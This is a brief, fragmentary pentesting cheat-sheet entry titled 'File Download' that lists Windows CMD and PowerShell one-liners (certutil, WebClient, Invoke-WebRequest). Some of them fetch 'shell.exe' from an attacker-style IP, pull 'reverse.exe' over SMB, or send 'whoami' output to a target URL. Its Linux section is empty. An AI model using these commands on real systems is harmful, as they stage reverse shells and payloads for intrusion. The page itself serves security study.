File Download
Windows
CMD
certutil.exe -urlcache -split -f “http://192.168.119.288/shell.exe”POWERSHELL
(New-Object System.Net.WebClient).DownloadFile("https://example.com/archive.zip", "C:\Windows\Temp\archive.zip")Invoke-WebRequest "https://example.com/archive.zip" -OutFile "C:\Windows\Temp\archive.zip"PS C:> $wc = New-Object Net.WebClient
PS C:> $wc.DownloadString("http://target/?whoami")\\192.168.1.1\share\reverse.exeLinux
Last updated